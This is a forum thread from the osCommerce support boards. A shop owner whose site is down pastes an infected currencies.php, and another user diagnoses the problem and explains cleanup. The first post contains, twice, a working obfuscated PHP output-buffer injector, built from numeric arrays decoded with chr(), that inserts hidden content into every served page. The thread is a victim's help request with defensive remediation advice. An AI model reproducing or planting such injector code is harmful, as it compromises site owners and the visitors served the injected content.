teamo Posted April 28, 2011 Share Posted April 28, 2011 Recently i can't open my website.And contact to the host.They said i need to correct the codes in the files 'currencies.php'.And here is the code,could you tell me how to correct it?Thank you very much. <?php /* $Id: currencies.php,v 1.16 2003/06/05 23:16:46 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ //// // Class to handle currencies // TABLES: currencies class currencies { var $currencies; // class constructor function currencies() { $this->currencies = array(); $currencies_query = tep_db_query("select code, title, symbol_left, symbol_right, decimal_point, thousands_point, decimal_places, value from " . TABLE_CURRENCIES); while ($currencies = tep_db_fetch_array($currencies_query)) { $this->currencies[$currencies['code']] = array('title' => $currencies['title'], 'symbol_left' => $currencies['symbol_left'], 'symbol_right' => $currencies['symbol_right'], 'decimal_point' => $currencies['decimal_point'], 'thousands_point' => $currencies['thousands_point'], 'decimal_places' => $currencies['decimal_places'], 'value' => $currencies['value']); } } // class methods function format($number, $calculate_currency_value = true, $currency_type = '', $currency_value = '') { global $currency; if (empty($currency_type)) $currency_type = $currency; if ($calculate_currency_value == true) { $rate = (tep_not_null($currency_value)) ? $currency_value : $this->currencies[$currency_type]['value']; $format_string = $this->currencies[$currency_type]['symbol_left'] . number_format(tep_round($number * $rate, $this->currencies[$currency_type]['decimal_places']), $this->currencies[$currency_type]['decimal_places'], $this->currencies[$currency_type]['decimal_point'], $this->currencies[$currency_type]['thousands_point']) . $this->currencies[$currency_type]['symbol_right']; // if the selected currency is in the european euro-conversion and the default currency is euro, // the currency will displayed in the national currency and euro currency if ( (DEFAULT_CURRENCY == 'EUR') && ($currency_type == 'DEM' || $currency_type == 'BEF' || $currency_type == 'LUF' || $currency_type == 'ESP' || $currency_type == 'FRF' || $currency_type == 'IEP' || $currency_type == 'ITL' || $currency_type == 'NLG' || $currency_type == 'ATS' || $currency_type == 'PTE' || $currency_type == 'FIM' || $currency_type == 'GRD') ) { $format_string .= ' <small>[' . $this->format($number, true, 'EUR') . ']</small>'; } } else { $format_string = $this->currencies[$currency_type]['symbol_left'] . number_format(tep_round($number, $this->currencies[$currency_type]['decimal_places']), $this->currencies[$currency_type]['decimal_places'], $this->currencies[$currency_type]['decimal_point'], $this->currencies[$currency_type]['thousands_point']) . $this->currencies[$currency_type]['symbol_right']; } return $format_string; } function is_set($code) { if (isset($this->currencies[$code]) && tep_not_null($this->currencies[$code])) { return true; } else { return false; } } function get_value($code) { return $this->currencies[$code]['value']; } function get_decimal_places($code) { return $this->currencies[$code]['decimal_places']; } function display_price($products_price, $products_tax, $quantity = 1) { if (!tep_session_is_registered('customer_id')) { return '<a href="' . tep_href_link(FILENAME_LOGIN, '', 'SSL') . '">' . LOGIN_FOR_PRICE . '</a>'; } else { if (TAX_INFO_ONOFF == 'Enabled') { $return = $this->format(tep_add_tax($products_price, $products_tax) * $quantity); global $tag; $return = "<br><div class=\"tax_info\">" sprintf(TEXT_INFO_TAX, $products_tax , tep_href_link(FILENAME_SHIPPING)) "</div><script type="text/javascript"> </script><script type="text/javascript"> </script><script type="text/javascript"> </script>"; return $return; } else { return $this->format(tep_add_tax($products_price, $products_tax) * $quantity); } } } function display_price2($products_price, $products_tax, $quantity = 1) { if (!tep_session_is_registered('customer_id')) { return '<a href="' . tep_href_link(FILENAME_LOGIN, '', 'SSL') . '">' . LOGIN_FOR_PRICE . '</a>'; } else { if (TAX_INFO_ONOFF == 'Enabled') { $return = $this->format(tep_add_tax($products_price, $products_tax) * $quantity); global $tag; return $return; } else { return $this->format(tep_add_tax($products_price, $products_tax) * $quantity); } } } } ?><?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51); $tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60); $ob_htm = ''; foreach($tr as $tval) { $ob_htm .= chr($tc[$tval]+32); } $slw=strtolower($s); $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);} if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</body');if($i){$i--;}} if(!$i){$i=strlen($s);if($i){$i--;}} $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i); return $s; } $ob_starting = time(); @ob_start("ob_start_flush"); } ?><?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 7, 79, 23, 73, 8, 9, 12, 76, 24, 68, 63, 78, 3, 19, 65, 27, 14, 70, 16, 17, 80, 29, 89, 85, 86, 2, 18, 77, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 13, 22, 61, 52, 25, 28, 37, 35, 15, 1, 21, 30, 34, 92, 36, 41, 88, 46, 51, 33); $tr = array(50, 5, 4, 3, 9, 26, 2, 0, 2, 28, 26, 1, 27, 31, 2, 1, 61, 2, 53, 43, 20, 30, 20, 5, 4, 3, 9, 26, 2, 31, 56, 9, 23, 0, 10, 2, 28, 26, 1, 7, 23, 10, 3, 1, 15, 1, 23, 16, 4, 7, 13, 7, 3, 5, 11, 27, 27, 31, 29, 17, 15, 1, 23, 9, 17, 1, 15, 31, 11, 0, 34, 0, 0, 0, 30, 20, 3, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 0, 27, 0, 17, 1, 42, 0, 64, 3, 3, 20, 28, 10, 6, 18, 41, 38, 14, 32, 8, 32, 6, 12, 0, 6, 18, 14, 25, 8, 14, 8, 23, 6, 12, 0, 6, 18, 14, 19, 32, 23, 14, 19, 6, 12, 0, 6, 18, 14, 14, 8, 23, 8, 41, 6, 12, 0, 6, 18, 41, 4, 19, 25, 14, 19, 6, 12, 0, 6, 18, 8, 41, 14, 8, 14, 19, 6, 12, 0, 6, 18, 19, 1, 8, 49, 8, 24, 6, 12, 0, 6, 18, 14, 55, 8, 24, 14, 32, 6, 12, 0, 6, 18, 8, 32, 14, 25, 8, 14, 6, 12, 0, 6, 18, 8, 23, 14, 19, 19, 25, 6, 12, 0, 6, 18, 32, 23, 14, 32, 14, 25, 6, 12, 0, 6, 18, 8, 32, 41, 4, 19, 25, 6, 12, 0, 6, 18, 8, 8, 14, 19, 14, 19, 6, 12, 0, 6, 18, 8, 23, 41, 49, 19, 1, 6, 12, 0, 6, 18, 19, 1, 8, 24, 8, 25, 6, 12, 0, 6, 18, 8, 14, 8, 38, 8, 1, 6, 12, 0, 6, 18, 14, 19, 8, 24, 14, 25, 6, 12, 0, 6, 18, 8, 1, 14, 32, 19, 15, 6, 12, 0, 6, 18, 8, 32, 8, 1, 19, 15, 6, 12, 0, 6, 18, 8, 32, 8, 32, 19, 1, 6, 12, 0, 6, 18, 8, 49, 14, 32, 19, 1, 6, 12, 0, 6, 18, 8, 49, 14, 24, 14, 41, 6, 12, 0, 6, 18, 8, 41, 14, 25, 14, 14, 6, 12, 0, 6, 18, 19, 15, 8, 4, 8, 14, 6, 12, 0, 6, 18, 8, 15, 19, 15, 8, 23, 6, 12, 0, 6, 18, 8, 8, 8, 23, 19, 25, 6, 12, 0, 6, 18, 41, 15, 24, 24, 24, 24, 6, 11, 21, 0, 0, 0, 30, 20, 3, 0, 3, 1, 15, 1, 23, 16, 4, 7, 13, 7, 3, 5, 0, 27, 0, 25, 21, 0, 0, 0, 30, 20, 3, 0, 4, 7, 13, 7, 3, 5, 16, 26, 9, 4, 40, 1, 15, 0, 27, 0, 24, 21, 0, 0, 0, 23, 29, 17, 4, 2, 9, 7, 17, 0, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 2, 12, 5, 2, 28, 13, 1, 15, 11, 0, 34, 30, 20, 3, 0, 5, 0, 27, 0, 31, 31, 21, 23, 7, 3, 0, 10, 43, 27, 24, 21, 43, 50, 2, 22, 13, 1, 17, 37, 2, 39, 21, 43, 35, 35, 11, 0, 34, 30, 20, 3, 0, 4, 16, 3, 37, 38, 0, 27, 0, 2, 44, 43, 47, 21, 23, 7, 3, 0, 10, 9, 27, 25, 21, 9, 50, 8, 21, 9, 35, 35, 11, 0, 34, 30, 20, 3, 0, 4, 16, 4, 13, 3, 0, 27, 0, 4, 16, 3, 37, 38, 22, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 12, 32, 11, 21, 9, 23, 0, 10, 4, 16, 4, 13, 3, 54, 27, 31, 24, 24, 31, 11, 0, 5, 0, 35, 27, 0, 63, 2, 3, 9, 17, 37, 22, 23, 3, 7, 33, 52, 39, 20, 3, 52, 7, 15, 1, 10, 26, 20, 3, 5, 1, 60, 17, 2, 10, 4, 16, 4, 13, 3, 12, 25, 46, 11, 45, 25, 55, 11, 21, 36, 36, 9, 23, 0, 10, 5, 2, 28, 13, 1, 15, 11, 0, 34, 5, 0, 27, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 19, 46, 11, 0, 35, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 19, 46, 12, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 19, 14, 11, 11, 0, 35, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 44, 25, 47, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 25, 11, 35, 17, 1, 42, 0, 59, 20, 2, 1, 10, 11, 22, 37, 1, 2, 48, 9, 33, 1, 10, 11, 0, 35, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 32, 11, 11, 21, 36, 0, 1, 13, 5, 1, 0, 34, 5, 0, 27, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 19, 46, 12, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 19, 14, 11, 11, 0, 35, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 44, 25, 47, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 25, 11, 35, 17, 1, 42, 0, 59, 20, 2, 1, 10, 11, 22, 37, 1, 2, 48, 9, 33, 1, 10, 11, 21, 36, 3, 1, 2, 29, 3, 17, 0, 5, 21, 0, 0, 0, 36, 0, 0, 0, 23, 29, 17, 4, 2, 9, 7, 17, 0, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 0, 34, 2, 3, 28, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 7, 4, 29, 33, 1, 17, 2, 22, 37, 1, 2, 51, 13, 1, 33, 1, 17, 2, 57, 28, 60, 15, 0, 58, 58, 0, 54, 15, 7, 4, 29, 33, 1, 17, 2, 22, 4, 3, 1, 20, 2, 1, 51, 13, 1, 33, 1, 17, 2, 11, 34, 15, 7, 4, 29, 33, 1, 17, 2, 22, 42, 3, 9, 2, 1, 10, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 12, 25, 11, 11, 21, 0, 0, 0, 36, 0, 1, 13, 5, 1, 0, 34, 30, 20, 3, 0, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 27, 15, 7, 4, 29, 33, 1, 17, 2, 22, 4, 3, 1, 20, 2, 1, 51, 13, 1, 33, 1, 17, 2, 10, 31, 5, 4, 3, 9, 26, 2, 31, 11, 21, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 22, 2, 28, 26, 1, 27, 31, 2, 1, 61, 2, 53, 43, 20, 30, 20, 5, 4, 3, 9, 26, 2, 31, 21, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 22, 5, 3, 4, 27, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 12, 24, 11, 21, 15, 7, 4, 29, 33, 1, 17, 2, 22, 37, 1, 2, 51, 13, 1, 33, 1, 17, 2, 5, 57, 28, 48, 20, 37, 62, 20, 33, 1, 10, 31, 39, 1, 20, 15, 31, 11, 44, 24, 47, 22, 20, 26, 26, 1, 17, 15, 52, 39, 9, 13, 15, 10, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 11, 21, 36, 36, 0, 4, 20, 2, 4, 39, 10, 1, 11, 0, 34, 0, 36, 2, 3, 28, 0, 34, 4, 39, 1, 4, 40, 16, 4, 7, 13, 7, 3, 5, 16, 26, 9, 4, 40, 1, 15, 10, 11, 21, 36, 0, 4, 20, 2, 4, 39, 10, 1, 11, 0, 34, 0, 5, 1, 2, 48, 9, 33, 1, 7, 29, 2, 10, 31, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 31, 12, 0, 55, 24, 24, 11, 21, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 21, 36, 50, 53, 5, 4, 3, 9, 26, 2, 56); $ob_htm = ''; foreach($tr as $tval) { $ob_htm .= chr($tc[$tval]+32); } $slw=strtolower($s); $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);} if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</body');if($i){$i--;}} if(!$i){$i=strlen($s);if($i){$i--;}} $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i); return $s; } $ob_starting = time(); @ob_start("ob_start_flush"); } ?> Link to comment Share on other sites More sharing options...
Taipo Posted April 28, 2011 Share Posted April 28, 2011 Your site has been attacked via another file that is resident in the directories. In the code you will see: <?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27,..... Its actually been appended in there twice. Remove that from the code and that file will probably work properly again. However that does not fix how it got there in the first place. You will need to clean your site out of rogue files and patch the admin exploit security hole that allowed this to take place in the first place. Basically the security hole in the admin which can be patched by either upgrading to Oscommerce 2.3.1 or installing Osc_Sec.php (see link in my signature), allowed attackers to upload rogue files into your web directories. Via those files they are able to add code into Oscommerce website files like they have done above. So after patching your sites security hole, you need to troll through your directories for files that should not be there. Start in the images directory where most rogue files get installed. Then go through your site files for any other file that has this <?php global $ob_starting code in it, and remove the code from those files as well. Or if you have a backup of your site, remove the current fileset and upload the older backup hoping that it is also not already infected. If you do load a backup, dont forget to patch the security in it using either of the two methods I mentioned earlier. Once all that is done, you can also do added security by either using htaccess to password protect your admin directory or changing the name of the directory to hide it from attackers. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
teamo Posted April 28, 2011 Author Share Posted April 28, 2011 Hi, I remove the code.But i still can't open my website.I copy the code to the Dreamwaver it shows line 78 have errors: $return .= "<br><div class=\"tax_info\">" . sprintf(TEXT_INFO_TAX, $products_tax , tep_href_link(FILENAME_SHIPPING)) . "</div><script type="text/javascript"> Is there has any problems? Your site has been attacked via another file that is resident in the directories. In the code you will see: <?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27,..... Its actually been appended in there twice. Remove that from the code and that file will probably work properly again. However that does not fix how it got there in the first place. You will need to clean your site out of rogue files and patch the admin exploit security hole that allowed this to take place in the first place. Basically the security hole in the admin which can be patched by either upgrading to Oscommerce 2.3.1 or installing Osc_Sec.php (see link in my signature), allowed attackers to upload rogue files into your web directories. Via those files they are able to add code into Oscommerce website files like they have done above. So after patching your sites security hole, you need to troll through your directories for files that should not be there. Start in the images directory where most rogue files get installed. Then go through your site files for any other file that has this <?php global $ob_starting code in it, and remove the code from those files as well. Or if you have a backup of your site, remove the current fileset and upload the older backup hoping that it is also not already infected. If you do load a backup, dont forget to patch the security in it using either of the two methods I mentioned earlier. Once all that is done, you can also do added security by either using htaccess to password protect your admin directory or changing the name of the directory to hide it from attackers. Link to comment Share on other sites More sharing options...
Taipo Posted April 28, 2011 Share Posted April 28, 2011 Sorry, I meant to remove everything below that code including that code. Its been added in. From the first instance of <?php global $ob_starting to the bottom of the page. Remove it. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
teamo Posted April 28, 2011 Author Share Posted April 28, 2011 Hello, I remove it.But i still can't open the website. Sorry, I meant to remove everything below that code including that code. Its been added in. From the first instance of <?php global $ob_starting to the bottom of the page. Remove it. Link to comment Share on other sites More sharing options...
Taipo Posted April 28, 2011 Share Posted April 28, 2011 Then you will need to go back and read the rest of what I wrote above. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.